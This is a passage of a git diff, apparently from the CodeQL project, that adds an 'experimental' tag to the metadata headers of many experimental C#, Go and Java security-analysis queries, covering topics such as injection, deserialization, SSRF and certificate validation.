Features/JsonWebTokenHandler/security-validation-disabled.ql b/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql index 84c846c3a91..54a2301734d 100644 --- a/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql +++ b/csharp/ql/src/experimental/Security Features/JsonWebTokenHandler/security-validation-disabled.ql @@ -3,6 +3,7 @@ * @description Check if security sensitive token validations for `JsonWebTokenHandler` are being disabled. * @kind problem * @tags security + * experimental * JsonWebTokenHandler * manual-verification-required * @id cs/json-webtoken-handler/security-validations-disabled diff --git a/csharp/ql/src/experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql b/csharp/ql/src/experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql index be79f2849ad..47153f926c1 100644 --- a/csharp/ql/src/experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql +++ b/csharp/ql/src/experimental/Security Features/Serialization/DefiningDatasetRelatedType.ql @@ -5,6 +5,7 @@ * @problem.severity warning * @id cs/dataset-serialization/defining-dataset-related-type * @tags security + * experimental */ import csharp diff --git a/csharp/ql/src/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql b/csharp/ql/src/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql index 320096d6301..0e87f724b96 100644 --- a/csharp/ql/src/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql +++ b/csharp/ql/src/experimental/Security Features/Serialization/DefiningPotentiallyUnsafeXmlSerializer.ql @@ -6,6 +6,7 @@ * @precision medium * @id cs/dataset-serialization/defining-potentially-unsafe-xml-serializer * @tags security + * experimental */ import csharp diff --git a/csharp/ql/src/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql b/csharp/ql/src/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql index 5907e4be311..00622007cbf 100644 --- a/csharp/ql/src/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql +++ b/csharp/ql/src/experimental/Security Features/Serialization/UnsafeTypeUsedDataContractSerializer.ql @@ -6,6 +6,7 @@ * @precision medium * @id cs/dataset-serialization/unsafe-type-used-data-contract-serializer * @tags security + * experimental */ import csharp diff --git a/csharp/ql/src/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql b/csharp/ql/src/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql index d4392ca4544..fbcba87bcf6 100644 --- a/csharp/ql/src/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql +++ b/csharp/ql/src/experimental/Security Features/Serialization/XmlDeserializationWithDataSet.ql @@ -6,6 +6,7 @@ * @precision medium * @id cs/dataset-serialization/xml-deserialization-with-dataset * @tags security + * experimental */ import csharp diff --git a/csharp/ql/src/experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql b/csharp/ql/src/experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql index c9d247d69f3..b0f066ba70b 100644 --- a/csharp/ql/src/experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql +++ b/csharp/ql/src/experimental/Security Features/backdoor/DangerousNativeFunctionCall.ql @@ -6,6 +6,7 @@ * @precision low * @id cs/backdoor/dangerous-native-functions * @tags security + * experimental * solorigate */ diff --git a/csharp/ql/src/experimental/Security Features/backdoor/PotentialTimeBomb.ql b/csharp/ql/src/experimental/Security Features/backdoor/PotentialTimeBomb.ql index 9ccbd675486..7f1d48788db 100644 --- a/csharp/ql/src/experimental/Security Features/backdoor/PotentialTimeBomb.ql +++ b/csharp/ql/src/experimental/Security Features/backdoor/PotentialTimeBomb.ql @@ -6,6 +6,7 @@ * @problem.severity warning * @id cs/backdoor/potential-time-bomb * @tags security + * experimental * solorigate */ diff --git a/csharp/ql/src/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql b/csharp/ql/src/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql index 6f5acf29f1d..17c59a338a4 100644 --- a/csharp/ql/src/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql +++ b/csharp/ql/src/experimental/Security Features/backdoor/ProcessNameToHashTaintFlow.ql @@ -3,6 +3,7 @@ * @description Flow from a function retrieving process name to a hash function. * @kind path-problem * @tags security + * experimental * solorigate * @problem.severity warning * @precision medium diff --git a/go/ql/src/experimental/CWE-090/LDAPInjection.ql b/go/ql/src/experimental/CWE-090/LDAPInjection.ql index 48f751b29bd..cdcc38ebd90 100644 --- a/go/ql/src/experimental/CWE-090/LDAPInjection.ql +++ b/go/ql/src/experimental/CWE-090/LDAPInjection.ql @@ -6,6 +6,7 @@ * @problem.severity error * @id go/ldap-injection * @tags security + * experimental * external/cwe/cwe-90 */ diff --git a/go/ql/src/experimental/CWE-1004/CookieWithoutHttpOnly.ql b/go/ql/src/experimental/CWE-1004/CookieWithoutHttpOnly.ql index ff6956a66ef..a16a446fe56 100644 --- a/go/ql/src/experimental/CWE-1004/CookieWithoutHttpOnly.ql +++ b/go/ql/src/experimental/CWE-1004/CookieWithoutHttpOnly.ql @@ -9,6 +9,7 @@ * @precision high * @id go/cookie-httponly-not-set * @tags security + * experimental * external/cwe/cwe-1004 */ diff --git a/go/ql/src/experimental/CWE-285/PamAuthBypass.ql b/go/ql/src/experimental/CWE-285/PamAuthBypass.ql index 4a9d953fc40..3e6864c021f 100644 --- a/go/ql/src/experimental/CWE-285/PamAuthBypass.ql +++ b/go/ql/src/experimental/CWE-285/PamAuthBypass.ql @@ -6,6 +6,7 @@ * @id go/pam-auth-bypass * @tags maintainability * correctness + * experimental * external/cwe/cwe-561 * external/cwe/cwe-285 * @precision very-high diff --git a/go/ql/src/experimental/CWE-321/HardcodedKeys.ql b/go/ql/src/experimental/CWE-321/HardcodedKeys.ql index 06dacfcac27..47851d8b4b9 100644 --- a/go/ql/src/experimental/CWE-321/HardcodedKeys.ql +++ b/go/ql/src/experimental/CWE-321/HardcodedKeys.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id go/hardcoded-key * @tags security + * experimental * external/cwe/cwe-321 */ diff --git a/go/ql/src/experimental/CWE-327/WeakCryptoAlgorithm.ql b/go/ql/src/experimental/CWE-327/WeakCryptoAlgorithm.ql index 36f95c7d394..04a7dae5595 100644 --- a/go/ql/src/experimental/CWE-327/WeakCryptoAlgorithm.ql +++ b/go/ql/src/experimental/CWE-327/WeakCryptoAlgorithm.ql @@ -5,8 +5,9 @@ * @problem.severity error * @id go/weak-crypto-algorithm * @tags security - * external/cwe/cwe-327 - * external/cwe/cwe-328 + * experimental + * external/cwe/cwe-327 + * external/cwe/cwe-328 */ import go diff --git a/go/ql/src/experimental/CWE-369/DivideByZero.ql b/go/ql/src/experimental/CWE-369/DivideByZero.ql index b2e61bef37d..9e48e7f6fc4 100644 --- a/go/ql/src/experimental/CWE-369/DivideByZero.ql +++ b/go/ql/src/experimental/CWE-369/DivideByZero.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id go/divide-by-zero * @tags security + * experimental * external/cwe/cwe-369 */ diff --git a/go/ql/src/experimental/CWE-400/DatabaseCallInLoop.ql b/go/ql/src/experimental/CWE-400/DatabaseCallInLoop.ql index eaabdea1e57..ed02275a33c 100644 --- a/go/ql/src/experimental/CWE-400/DatabaseCallInLoop.ql +++ b/go/ql/src/experimental/CWE-400/DatabaseCallInLoop.ql @@ -6,6 +6,8 @@ * @problem.severity warning * @precision high * @id go/examples/database-call-in-loop + * @tags security + * experimental */ import go diff --git a/go/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql b/go/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql index 81c2663a3b1..eb6c7668f06 100644 --- a/go/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql +++ b/go/ql/src/experimental/CWE-79/HTMLTemplateEscapingPassthrough.ql @@ -6,6 +6,7 @@ * @problem.severity warning * @id go/html-template-escaping-passthrough * @tags security + * experimental * external/cwe/cwe-79 */ diff --git a/go/ql/src/experimental/CWE-807/SensitiveConditionBypass.ql b/go/ql/src/experimental/CWE-807/SensitiveConditionBypass.ql index 632e90065e6..5edc839f60c 100644 --- a/go/ql/src/experimental/CWE-807/SensitiveConditionBypass.ql +++ b/go/ql/src/experimental/CWE-807/SensitiveConditionBypass.ql @@ -8,6 +8,8 @@ * @tags external/cwe/cwe-807 * external/cwe/cwe-247 * external/cwe/cwe-350 + * experimental + * security */ import go diff --git a/go/ql/src/experimental/CWE-840/ConditionalBypass.ql b/go/ql/src/experimental/CWE-840/ConditionalBypass.ql index 1776c3a7d87..87bfac1c1d5 100644 --- a/go/ql/src/experimental/CWE-840/ConditionalBypass.ql +++ b/go/ql/src/experimental/CWE-840/ConditionalBypass.ql @@ -6,6 +6,8 @@ * @kind problem * @problem.severity warning * @tags external/cwe/cwe-840 + * security + * experimental */ import go diff --git a/go/ql/src/experimental/CWE-918/SSRF.ql b/go/ql/src/experimental/CWE-918/SSRF.ql index 4c14969c35f..a58ac660385 100644 --- a/go/ql/src/experimental/CWE-918/SSRF.ql +++ b/go/ql/src/experimental/CWE-918/SSRF.ql @@ -6,6 +6,7 @@ * @problem.severity error * @precision high * @tags security + * experimental * external/cwe/cwe-918 */ diff --git a/go/ql/src/experimental/CWE-942/CorsMisconfiguration.ql b/go/ql/src/experimental/CWE-942/CorsMisconfiguration.ql index 9dd62083df4..007178941f7 100644 --- a/go/ql/src/experimental/CWE-942/CorsMisconfiguration.ql +++ b/go/ql/src/experimental/CWE-942/CorsMisconfiguration.ql @@ -7,6 +7,7 @@ * @problem.severity warning * @id go/cors-misconfiguration * @tags security + * experimental * external/cwe/cwe-942 * external/cwe/cwe-346 */ diff --git a/go/ql/src/experimental/Unsafe/WrongUsageOfUnsafe.ql b/go/ql/src/experimental/Unsafe/WrongUsageOfUnsafe.ql index 3dfc90dc40a..607ec2aa11e 100644 --- a/go/ql/src/experimental/Unsafe/WrongUsageOfUnsafe.ql +++ b/go/ql/src/experimental/Unsafe/WrongUsageOfUnsafe.ql @@ -6,6 +6,7 @@ * @problem.severity error * @id go/wrong-usage-of-unsafe * @tags security + * experimental * external/cwe/cwe-119 * external/cwe/cwe-126 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/InsecureSpringActuatorConfig.ql b/java/ql/src/experimental/Security/CWE/CWE-016/InsecureSpringActuatorConfig.ql index 698dae57b96..800fc6db564 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-016/InsecureSpringActuatorConfig.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-016/InsecureSpringActuatorConfig.ql @@ -7,6 +7,7 @@ * @precision high * @id java/insecure-spring-actuator-config * @tags security + * experimental * external/cwe/cwe-016 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql index 85daa77cc56..b700e691550 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-016/SpringBootActuators.ql @@ -7,6 +7,7 @@ * @precision high * @id java/spring-boot-exposed-actuators * @tags security + * experimental * external/cwe/cwe-16 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-020/Log4jJndiInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-020/Log4jJndiInjection.ql index 369833a4df2..d65e2110de1 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-020/Log4jJndiInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-020/Log4jJndiInjection.ql @@ -8,6 +8,7 @@ * @precision high * @id java/log4j-injection * @tags security + * experimental * external/cwe/cwe-020 * external/cwe/cwe-074 * external/cwe/cwe-400 diff --git a/java/ql/src/experimental/Security/CWE/CWE-036/OpenStream.ql b/java/ql/src/experimental/Security/CWE/CWE-036/OpenStream.ql index dd23cfd5ff8..f3fe58e59e0 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-036/OpenStream.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-036/OpenStream.ql @@ -7,6 +7,7 @@ * @precision medium * @id java/openstream-called-on-tainted-url * @tags security + * experimental * external/cwe/cwe-036 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-073/FilePathInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-073/FilePathInjection.ql index 9c976c8dce7..3bb8ef93fd2 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-073/FilePathInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-073/FilePathInjection.ql @@ -8,6 +8,7 @@ * @precision high * @id java/file-path-injection * @tags security + * experimental * external/cwe-073 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-078/ExecTainted.ql b/java/ql/src/experimental/Security/CWE/CWE-078/ExecTainted.ql index 7915d8f2bce..e672519d1c7 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-078/ExecTainted.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-078/ExecTainted.ql @@ -7,6 +7,7 @@ * @precision high * @id java/command-line-injection-experimental * @tags security + * experimental * external/cwe/cwe-078 * external/cwe/cwe-088 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisAnnotationSqlInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisAnnotationSqlInjection.ql index 2d1e605c426..35bfa0f0e17 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisAnnotationSqlInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisAnnotationSqlInjection.ql @@ -8,6 +8,7 @@ * @precision high * @id java/mybatis-annotation-sql-injection * @tags security + * experimental * external/cwe/cwe-089 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisMapperXmlSqlInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisMapperXmlSqlInjection.ql index 9aeb95ea94a..53359d448de 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisMapperXmlSqlInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-089/MyBatisMapperXmlSqlInjection.ql @@ -8,6 +8,7 @@ * @precision high * @id java/mybatis-xml-sql-injection * @tags security + * experimental * external/cwe/cwe-089 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/BeanShellInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-094/BeanShellInjection.ql index b8301d4f977..5c4b4288eab 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/BeanShellInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/BeanShellInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/beanshell-injection * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/InsecureDexLoading.ql b/java/ql/src/experimental/Security/CWE/CWE-094/InsecureDexLoading.ql index bae3ed63d70..5c0eb61253b 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/InsecureDexLoading.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/InsecureDexLoading.ql @@ -7,6 +7,7 @@ * @precision high * @id java/android-insecure-dex-loading * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/JShellInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-094/JShellInjection.ql index 451dff79444..bda4d170c60 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/JShellInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/JShellInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/jshell-injection * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/JakartaExpressionInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-094/JakartaExpressionInjection.ql index 8190ec3d61f..5b09d0ac2d8 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/JakartaExpressionInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/JakartaExpressionInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/javaee-expression-injection * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/JythonInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-094/JythonInjection.ql index a3dc6e6c39a..743d6e9351f 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/JythonInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/JythonInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/jython-injection * @tags security + * experimental * external/cwe/cwe-094 * external/cwe/cwe-095 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/ScriptInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-094/ScriptInjection.ql index a7bb5fb0d18..5c1f5e17311 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/ScriptInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/ScriptInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/unsafe-eval * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/SpringImplicitViewManipulation.ql b/java/ql/src/experimental/Security/CWE/CWE-094/SpringImplicitViewManipulation.ql index e176c513213..a99664f49f0 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/SpringImplicitViewManipulation.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/SpringImplicitViewManipulation.ql @@ -6,6 +6,7 @@ * @precision high * @id java/spring-view-manipulation-implicit * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulation.ql b/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulation.ql index 3c490e6bf68..118f15860fc 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulation.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-094/SpringViewManipulation.ql @@ -6,6 +6,7 @@ * @precision high * @id java/spring-view-manipulation * @tags security + * experimental * external/cwe/cwe-094 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-1004/InsecureTomcatConfig.ql b/java/ql/src/experimental/Security/CWE/CWE-1004/InsecureTomcatConfig.ql index 5d259b63b14..4cf82d26714 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-1004/InsecureTomcatConfig.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-1004/InsecureTomcatConfig.ql @@ -6,6 +6,7 @@ * @precision medium * @id java/tomcat-disabled-httponly * @tags security + * experimental * external/cwe/cwe-1004 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-1004/SensitiveCookieNotHttpOnly.ql b/java/ql/src/experimental/Security/CWE/CWE-1004/SensitiveCookieNotHttpOnly.ql index 1ee1bccd2f9..a43387a24b0 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-1004/SensitiveCookieNotHttpOnly.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-1004/SensitiveCookieNotHttpOnly.ql @@ -7,6 +7,7 @@ * @precision medium * @id java/sensitive-cookie-not-httponly * @tags security + * experimental * external/cwe/cwe-1004 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-200/InsecureWebResourceResponse.ql b/java/ql/src/experimental/Security/CWE/CWE-200/InsecureWebResourceResponse.ql index 7327f2cebf2..41b7cc0e1e3 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-200/InsecureWebResourceResponse.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-200/InsecureWebResourceResponse.ql @@ -6,6 +6,7 @@ * @id java/insecure-webview-resource-response * @problem.severity error * @tags security + * experimental * external/cwe/cwe-200 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-200/SensitiveAndroidFileLeak.ql b/java/ql/src/experimental/Security/CWE/CWE-200/SensitiveAndroidFileLeak.ql index 9769ee1eafc..38d128ee81a 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-200/SensitiveAndroidFileLeak.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-200/SensitiveAndroidFileLeak.ql @@ -6,6 +6,7 @@ * @id java/sensitive-android-file-leak * @problem.severity warning * @tags security + * experimental * external/cwe/cwe-200 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-208/PossibleTimingAttackAgainstSignature.ql b/java/ql/src/experimental/Security/CWE/CWE-208/PossibleTimingAttackAgainstSignature.ql index 9e0835e2aac..f569bdb0107 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-208/PossibleTimingAttackAgainstSignature.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-208/PossibleTimingAttackAgainstSignature.ql @@ -9,6 +9,7 @@ * @precision medium * @id java/possible-timing-attack-against-signature * @tags security + * experimental * external/cwe/cwe-208 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstHeader.ql b/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstHeader.ql index 52405e9958e..1f92d09693f 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstHeader.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstHeader.ql @@ -7,6 +7,7 @@ * @precision high * @id java/timing-attack-against-headers-value * @tags security + * experimental * external/cwe/cwe-208 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstSignature.ql b/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstSignature.ql index 488b49684b2..15812817205 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstSignature.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-208/TimingAttackAgainstSignature.ql @@ -10,6 +10,7 @@ * @precision high * @id java/timing-attack-against-signature * @tags security + * experimental * external/cwe/cwe-208 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-295/JxBrowserWithoutCertValidation.ql b/java/ql/src/experimental/Security/CWE/CWE-295/JxBrowserWithoutCertValidation.ql index f664f4ce953..8e91ea4bb56 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-295/JxBrowserWithoutCertValidation.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-295/JxBrowserWithoutCertValidation.ql @@ -8,6 +8,7 @@ * @precision medium * @id java/jxbrowser/disabled-certificate-validation * @tags security + * experimental * external/cwe/cwe-295 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-297/IgnoredHostnameVerification.ql b/java/ql/src/experimental/Security/CWE/CWE-297/IgnoredHostnameVerification.ql index c4bb1192f2b..2a60ce988fc 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-297/IgnoredHostnameVerification.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-297/IgnoredHostnameVerification.ql @@ -7,6 +7,7 @@ * @precision high * @id java/ignored-hostname-verification * @tags security + * experimental * external/cwe/cwe-297 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-297/InsecureLdapEndpoint.ql b/java/ql/src/experimental/Security/CWE/CWE-297/InsecureLdapEndpoint.ql index 5ac93ffac2a..bba8213cf0a 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-297/InsecureLdapEndpoint.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-297/InsecureLdapEndpoint.ql @@ -8,6 +8,7 @@ * @precision medium * @id java/insecure-ldaps-endpoint * @tags security + * experimental * external/cwe/cwe-297 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-299/DisabledRevocationChecking.ql b/java/ql/src/experimental/Security/CWE/CWE-299/DisabledRevocationChecking.ql index a6d2049bd16..6d4c46d755e 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-299/DisabledRevocationChecking.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-299/DisabledRevocationChecking.ql @@ -7,6 +7,7 @@ * @precision high * @id java/disabled-certificate-revocation-checking * @tags security + * experimental * external/cwe/cwe-299 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-321/HardcodedJwtKey.ql b/java/ql/src/experimental/Security/CWE/CWE-321/HardcodedJwtKey.ql index 63c55793cbf..521a355bdab 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-321/HardcodedJwtKey.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-321/HardcodedJwtKey.ql @@ -5,6 +5,7 @@ * @problem.severity error * @id java/hardcoded-jwt-key * @tags security + * experimental * external/cwe/cwe-321 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-327/UnsafeTlsVersion.ql b/java/ql/src/experimental/Security/CWE/CWE-327/UnsafeTlsVersion.ql index 3a1195d8a7c..e5ec5284347 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-327/UnsafeTlsVersion.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-327/UnsafeTlsVersion.ql @@ -7,6 +7,7 @@ * @precision high * @id java/unsafe-tls-version * @tags security + * experimental * external/cwe/cwe-327 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-346/UnvalidatedCors.ql b/java/ql/src/experimental/Security/CWE/CWE-346/UnvalidatedCors.ql index c5a6c36d6a6..5f6146e2bc4 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-346/UnvalidatedCors.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-346/UnvalidatedCors.ql @@ -6,6 +6,7 @@ * @precision high * @id java/unvalidated-cors-origin-set * @tags security + * experimental * external/cwe/cwe-346 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql b/java/ql/src/experimental/Security/CWE/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql index 78d8bfee5f0..a7be1729279 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-348/ClientSuppliedIpUsedInSecurityCheck.ql @@ -7,6 +7,7 @@ * @precision high * @id java/ip-address-spoofing * @tags security + * experimental * external/cwe/cwe-348 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-352/JsonpInjection.ql b/java/ql/src/experimental/Security/CWE/CWE-352/JsonpInjection.ql index 71ee842f162..9518a04ff6f 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-352/JsonpInjection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-352/JsonpInjection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/jsonp-injection * @tags security + * experimental * external/cwe/cwe-352 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-400/ThreadResourceAbuse.ql b/java/ql/src/experimental/Security/CWE/CWE-400/ThreadResourceAbuse.ql index a3ef56f82cb..a1e9ea0ccac 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-400/ThreadResourceAbuse.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-400/ThreadResourceAbuse.ql @@ -6,6 +6,7 @@ * @id java/thread-resource-abuse * @problem.severity warning * @tags security + * experimental * external/cwe/cwe-400 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-470/UnsafeReflection.ql b/java/ql/src/experimental/Security/CWE/CWE-470/UnsafeReflection.ql index 6ff2bc27dd4..291b57e3713 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-470/UnsafeReflection.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-470/UnsafeReflection.ql @@ -7,6 +7,7 @@ * @precision high * @id java/unsafe-reflection * @tags security + * experimental * external/cwe/cwe-470 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-489/EJBMain.ql b/java/ql/src/experimental/Security/CWE/CWE-489/EJBMain.ql index fe69f2d9cea..4bb636fe6a9 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-489/EJBMain.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-489/EJBMain.ql @@ -6,6 +6,7 @@ * @precision medium * @id java/main-method-in-enterprise-bean * @tags security + * experimental * external/cwe/cwe-489 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-489/WebComponentMain.ql b/java/ql/src/experimental/Security/CWE/CWE-489/WebComponentMain.ql index c4b05b9fe2f..38e12700d1a 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-489/WebComponentMain.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-489/WebComponentMain.ql @@ -6,6 +6,7 @@ * @precision medium * @id java/main-method-in-web-components * @tags security + * experimental * external/cwe/cwe-489 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-489/devMode.ql b/java/ql/src/experimental/Security/CWE/CWE-489/devMode.ql index b9a41ba0271..96fd62e593c 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-489/devMode.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-489/devMode.ql @@ -7,6 +7,7 @@ * @precision high * @id java/struts-development-mode * @tags security + * experimental * external/cwe/cwe-489 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeDeserializationRmi.ql b/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeDeserializationRmi.ql index 2928ea76165..8582f8a1b5b 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeDeserializationRmi.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeDeserializationRmi.ql @@ -9,6 +9,7 @@ * @precision high * @id java/unsafe-deserialization-rmi * @tags security + * experimental * external/cwe/cwe-502 */ diff --git a/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInConfigurationClass.ql b/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInConfigurationClass.ql index 2914ebd7be2..28b164faa0d 100644 --- a/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInConfigurationClass.ql +++ b/java/ql/src/experimental/Security/CWE/CWE-502/UnsafeSpringExporterInConfigurationClass.ql @@ -8,6 +8,7 @@ * @precision high * @id 